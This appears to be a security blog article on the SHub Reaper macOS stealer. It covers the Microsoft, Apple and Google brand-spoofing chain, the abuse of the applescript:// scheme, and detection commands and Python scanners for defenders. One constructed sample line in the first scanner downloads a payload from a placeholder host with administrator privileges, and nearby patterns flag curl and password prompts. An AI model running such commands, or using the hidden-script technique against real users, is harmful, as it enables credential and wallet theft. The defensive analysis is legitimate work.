SHub Reaper: The Multi‑Brand macOS Stealer That Bypasses Tahoe’s Terminal Protections + Video

Introduction:

A newly emerged macOS information stealer, dubbed SHub Reaper, is raising the bar for multi‑stage infection chains. Unlike its predecessors that relied on basic “ClickFix” tricks, Reaper seamlessly impersonates Apple, Google, and Microsoft within a single attack—and does so without ever opening Terminal, effectively sidestepping Apple’s macOS Tahoe 26.4 mitigations. This article dissects Reaper’s technical anatomy, provides hands‑on detection commands for macOS defenders, and outlines actionable mitigation strategies.

Learning Objectives:

  • Understand how SHub Reaper chains three distinct brand spoofs (Microsoft, Apple, Google) in one attack flow.
  • Analyze the evasion techniques that bypass Terminal‑based protections and abuse native macOS tools like AppleScript and the `applescript://` scheme.
  • Implement detection and hardening measures using macOS native commands and endpoint detection rules.

You Should Know

1. The Three‑Stage Disguise Chain

SHub Reaper’s infection chain is a masterclass in social engineering. Each phase impersonates a different trusted brand, making the overall attack highly deceptive.

  • Stage 1 – Microsoft (Delivery): Victims are lured with fake WeChat or Miro installers hosted on a typo‑squatted Microsoft domain (e.g., micros0ft‑secure[.]com). This initial payload is often a signed disk image (.dmg) that triggers the next stage.
  • Stage 2 – Apple (Execution): Instead of pasting commands into Terminal, Reaper abuses the `applescript://` URL scheme. When a user clicks “Run” in Script Editor, the malware presents a convincing Apple XProtectRemediator “Security Update” window while executing hidden AppleScript commands in the background. Padded with fake installer text and ASCII art, the malicious code remains invisible to the casual user.
  • Stage 3 – Google (Persistence): After stealing credentials and wallet data, Reaper installs a persistent backdoor hidden inside a directory that mimics Google Software Update (e.g., /Library/Google/GoogleSoftwareUpdate/...). This adds longevity and makes removal harder for users who only check standard locations.

Step‑by‑step guide (detection & investigation):

  1. Monitor for `applescript://` URL invocations – check system logs for unexpected Script Editor launches:
    log show --predicate 'eventMessage contains "applescript://"' --last 1h

  2. List recently downloaded `.dmg` files and hash them for comparison against published IOCs (the glob must be `*.dmg`, quoted so the shell does not expand it):
    find ~/Downloads -name "*.dmg" -exec shasum -a 256 {} \;

  3. Inspect running AppleScript processes for obfuscated or lengthy scripts (`grep` needs `-E` for the alternation, and the `grep` itself is filtered out):
    ps aux | grep -iE "osascript|applescript" | grep -v grep

  4. Enumerate persistence directories associated with Google, Microsoft, or Apple spoofing:
    ls -la /Library/Google/ /Library/Application\ Support/Microsoft/ /Library/Apple/

2. Bypassing Tahoe’s Terminal Mitigations Using `applescript://`

Apple’s macOS Tahoe 26.4 introduced enhanced protections against terminal‑based social engineering (e.g., warnings when copying‑and‑pasting commands into Terminal). SHub Reaper evades these safeguards by abusing the `applescript://` URL scheme, which launches Script Editor directly, bypassing Terminal entirely.

Once Script Editor is open, the malware displays a fake “Run” prompt that looks like a legitimate system update. Behind the scenes, it executes a malicious AppleScript that:

  • Asks for the user’s macOS password (via a system‑like dialog).
  • Downloads and runs a second‑stage payload (the actual stealer and backdoor).
  • Uses padded content and ASCII art to visually hide the malicious commands below the visible scroll area.

Step‑by‑step guide (emulating & detecting this technique):

  1. Simulate (for testing only – isolated VM): create a harmless script that logs execution. The inner shell command is double‑quoted (escaped for AppleScript) so that `$(date)` is expanded; inside single quotes it would be written to the log literally:
    do shell script "echo \"$(date) - applescript:// executed\" >> /tmp/test.log"
    Save it as a `.scpt` file and trigger it via open -a "Script Editor" malicious.scpt.

  2. Detect abuse of `applescript://` in system logs:
    log show --predicate 'eventMessage contains "applescript://"' --info --last 6h | grep -v "com.apple"

  3. Monitor for Script Editor launched from non‑standard parent processes:
    sudo eslogger exec | grep -i "Script Editor"
    (Requires Endpoint Security framework; `eslogger` is part of Santa or custom tooling.)

  4. Check for suspicious AppleScript files that are obfuscated or contain long strings (wildcards quoted, the `-o` alternatives grouped, and each path passed as an argument so names with spaces survive):
    find / \( -name "*.scpt" -o -name "*.applescript" \) -type f 2>/dev/null -exec sh -c 'echo "$1"; strings "$1" | head -20' _ {} \;
    
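The following Python scanner is an added illustration (not code from the article or from SentinelOne) that automates step 4 and the padding trick described above: it flags a long run of blank or ASCII‑art lines followed by executable statements, plus the password prompt, privileged execution and payload‑download constructs. It works on script text (`.applescript`, or the output of `osadecompile` for compiled `.scpt`); the sample script and the PLACEHOLDER host are constructed.

```python
import re

# Constructed sample mimicking the layout the article describes: a fake
# "Security Update" banner, ASCII art, a long run of blank lines, and the
# real statements far below what Script Editor shows. Host is a placeholder.
SAMPLE_SCRIPT = (
    "-- XProtectRemediator Security Update: click Run to continue\n"
    "-- ==========================================================\n"
    "--      /\\_/\\   \n"
    "--     ( ^.^ )  \n"
    + "\n" * 60
    + 'display dialog "Enter your password" default answer "" with hidden answer\n'
    + 'do shell script "curl -o /tmp/u https://PLACEHOLDER.invalid/u" with administrator privileges\n'
)

PADDING_RUN = 30  # this many padding lines before a statement = hidden below the fold

SUSPICIOUS = [
    (r"with hidden answer", "password prompt via display dialog"),
    (r"with administrator privileges", "do shell script with admin privileges"),
    (r'do shell script\s+".*\b(curl|base64|osascript|nohup)\b', "do shell script fetching/decoding a payload"),
]

def is_padding(line):
    """Blank lines and ASCII-art lines (nothing alphanumeric) count as padding."""
    return re.search(r"[A-Za-z0-9]", line) is None

def scan_applescript(text):
    """Return a list of (line_no, reason) findings for one script's text."""
    findings, run = [], 0
    for no, line in enumerate(text.splitlines(), 1):
        if is_padding(line):
            run += 1
            continue
        # A real statement (not a comment) right after a long padding run
        if run >= PADDING_RUN and not line.lstrip().startswith("--"):
            findings.append((no, f"statement after {run} padding lines (off-screen in Script Editor)"))
        run = 0
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, line):
                findings.append((no, reason))
    return findings

if __name__ == "__main__":
    for no, reason in scan_applescript(SAMPLE_SCRIPT):
        print(f"line {no}: {reason}")
```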

3. Credential & Crypto Theft with AMOS‑Style Filegrabber

SHub Reaper extends beyond traditional cookie and password stealing. According to SentinelOne, this variant includes an AMOS‑style Filegrabber and chunked uploads, enabling attackers to exfiltrate documents, desktop files, and developer artifacts. Targeted applications include:

  • Browsers: Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, Orion
  • Wallets: Exodus, Atomic Wallet, Ledger Live, Electrum, Trezor Suite
  • Password managers: 1Password, Bitwarden, LastPass
  • System data: macOS Keychain, Telegram sessions, browser extensions, crypto wallet extensions (MetaMask, Phantom)

Detection commands (run on a clean system for baseline):

  • Check for unauthorized Keychain access:
    log show --predicate 'process == "securityd" AND eventMessage contains "Keychain" AND eventMessage contains "copy"' --last 1h

  • List all browser credential databases accessed recently (the alternatives are grouped and `-exec` is used because names such as "Login Data" contain spaces, which break a plain `xargs`):
    find ~/Library \( -name "Login Data" -o -name "Cookies" -o -name "*.sqlite" \) -type f -exec ls -la {} +

  • Monitor outbound connections to unusual domains (typical exfiltration ports 443, 8443). Hostnames are left resolvable (no `-n`) so the vendor filter has names to match, and `grep -E` handles the alternation:
    sudo lsof -i -P | grep ESTABLISHED | grep -viE "apple|google|microsoft"

4. Network‑Based Evasion & Anti‑Analysis

Before delivering the payload, the malware’s landing pages perform extensive fingerprinting. Scripts collect:

  • WebGL data, VPN indicators, browser extensions, and VM artifacts
  • Presence of security research tools (e.g., Wireshark, Frida, Hopper)
  • Debugger detection (e.g., intercepting F12, infinite debugger loops)

If analysis is suspected, the page may redirect to a Russian‑language “Access Denied” message or simply show a blank screen, making automated sandbox analysis difficult.

Defender checklist:

  • Use dynamic analysis tooling that emulates real user interaction (e.g., Selenium with stealth plugins), since the landing pages only serve the payload to browsers that pass their fingerprinting.
  • Block known malicious domains via DNS sinkhole or firewall. Extract IOCs from SentinelOne’s report (e.g., typo‑squatted Microsoft domains, specific `applescript://` URIs).
  • For enterprise, deploy endpoint rules that alert on Script Editor execution from non‑interactive contexts or from unsigned `.scpt` files.

5. Persistence & Backdoor Capabilities

Reaper’s final stage installs a persistent backdoor that provides operators with ongoing access. The backdoor is hidden in paths that impersonate Google’s legitimate update directories, such as:

/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdate

However, in this case, the binary is malicious and communicates with a C2 server. The backdoor can:

  • Download and execute additional payloads
  • Steal data on an ongoing basis
  • Pivot to other hosts on the same network

Step‑by‑step guide to detect such persistence:

  1. Check launch daemons and agents for fake Google/Microsoft paths (`grep -E` for the alternation):
    ls -la /Library/LaunchDaemons/ /Library/LaunchAgents/ ~/Library/LaunchAgents/
    grep -rE "GoogleSoftwareUpdate|Microsoft" /Library/LaunchDaemons/ /Library/LaunchAgents/ ~/Library/LaunchAgents/

  2. Verify code signatures of Google/Microsoft binaries:
    codesign -dvvv /Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdate
    (Legitimate binaries should be signed by “Google Inc.” or “Microsoft Corporation”.)

  3. Monitor for unusual network connections from processes in spoofed directories. `lsof -i` prints only the short command name, never the executable path, so select the processes by full command line first and then list their sockets:
    for pid in $(pgrep -f "/Library/Google|/Library/Microsoft"); do sudo lsof -i -n -P -p "$pid"; done
    
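The following Python triage helper is an added illustration (not the article's or SentinelOne's code) that automates steps 1 and 2 above: it reads a LaunchAgent/LaunchDaemon plist and, when the program lives under one of the vendor‑lookalike directories named in this article, parses the `codesign -dvvv` Authority chain and flags the item unless the signer is that vendor (both the “Google Inc.” name the article cites and Google's current “Google LLC” Developer ID are accepted). The plist and the two codesign outputs are constructed samples and TEAMID_PLACEHOLDER stands in for a real team identifier; on a Mac the live `codesign` call is used instead.

```python
import plistlib
import re
import shutil
import subprocess

# Vendor-lookalike directories from the article -> signing Authority names expected there.
VENDOR_DIRS = {
    "/Library/Google/": ("Google LLC", "Google Inc."),
    "/Library/Application Support/Microsoft/": ("Microsoft Corporation",),
}

# Constructed sample launch agent pointing at the impersonated Google update path.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.GoogleSoftwareUpdate</string>
  <key>ProgramArguments</key><array>
    <string>/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdate</string>
  </array>
</dict></plist>"""

# Constructed `codesign -dvvv` outputs: an unsigned binary and a vendor-signed one.
UNSIGNED_OUT = "/Library/Google/.../GoogleSoftwareUpdate: code object is not signed at all\n"
SIGNED_OUT = "Authority=Developer ID Application: Google LLC (TEAMID_PLACEHOLDER)\nAuthority=Apple Root CA\nTeamIdentifier=TEAMID_PLACEHOLDER\n"

def launch_item_program(plist_bytes):
    """Return (Label, executable path) from a LaunchAgent/LaunchDaemon plist."""
    p = plistlib.loads(plist_bytes)
    return p.get("Label", ""), p.get("Program") or (p.get("ProgramArguments") or [None])[0]

def parse_codesign(text):
    """Pull the Authority chain and TeamIdentifier out of codesign -dvvv output."""
    team = re.search(r"^TeamIdentifier=(.+)$", text, re.M)
    return re.findall(r"^Authority=(.+)$", text, re.M), (team.group(1) if team else None)

def codesign_output(path):
    """Live check on macOS; codesign writes its -d output to stderr. Empty elsewhere."""
    if shutil.which("codesign") is None:
        return ""
    return subprocess.run(["codesign", "-dvvv", path], capture_output=True, text=True).stderr

def assess_launch_item(plist_bytes, codesign_text=None):
    """Verdict for one launch item: a program under a vendor-lookalike directory must be
    signed by that vendor. Pass codesign_text from a triage bundle, or None to run live."""
    label, prog = launch_item_program(plist_bytes)
    for d, vendors in VENDOR_DIRS.items():
        if prog and prog.startswith(d):
            auths, team = parse_codesign(codesign_output(prog) if codesign_text is None else codesign_text)
            ok = any(v in a for a in auths for v in vendors)
            verdict = "ok" if ok else "SUSPICIOUS: vendor-lookalike path, not vendor-signed"
            return {"label": label, "program": prog, "team": team, "verdict": verdict}
    return {"label": label, "program": prog, "team": None, "verdict": "not under a watched vendor path"}
```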

What Undercode Say

  • Key Takeaway 1 – Evasion keeps evolving: SHub Reaper proves that macOS attackers are shifting away from terminal‑based commands to `applescript://` and other native macOS frameworks, effectively bypassing security features introduced in Tahoe. Defenders must expand visibility beyond Terminal logging.
  • Key Takeaway 2 – Multi‑brand spoofing is a powerful social engineering tactic: Using three different trusted brands (Microsoft for delivery, Apple for execution, Google for persistence) within one attack chain makes it much harder for users to recognize a single “tell.” Security awareness training should now cover multi‑stage impersonation scenarios, not just fake login pages.

Analysis:

The sophistication of SHub Reaper indicates that macOS is no longer a “safe” haven. Criminal operators are investing in platform‑specific tradecraft, borrowing techniques from Windows (e.g., living‑off‑the‑land, fileless execution) and adapting them to macOS. The use of the `applescript://` scheme is particularly concerning because AppleScript has deep system access and is often trusted by endpoint detection tools. Additionally, the inclusion of a persistent backdoor (not just one‑time data theft) suggests that attackers are interested in long‑term access for targeted extortion or corporate espionage. Enterprises with mixed macOS/Windows environments must unify detection across both platforms, focusing on behavioral patterns (e.g., unusual AppleScript executions, credential access from non‑standard processes) rather than simple signature matches.

Prediction

In the next 6–12 months, we will likely see a surge of macOS malware that completely avoids Terminal by abusing other native URL schemes (x-apple.systempreferences:, open -b, etc.) and scripting environments (JavaScript for Automation, Python). Apple may be forced to introduce execution prompts for `applescript://` similar to Terminal’s “paste warning.” Meanwhile, attackers will double down on brand spoofing, possibly mimicking Amazon Web Services (AWS) or Zoom to target specific verticals. Defenders should prepare for a new class of “scheme‑based” infection vectors and update their endpoint monitoring accordingly.

Reported By: Jamie Williams – Hackers Feeds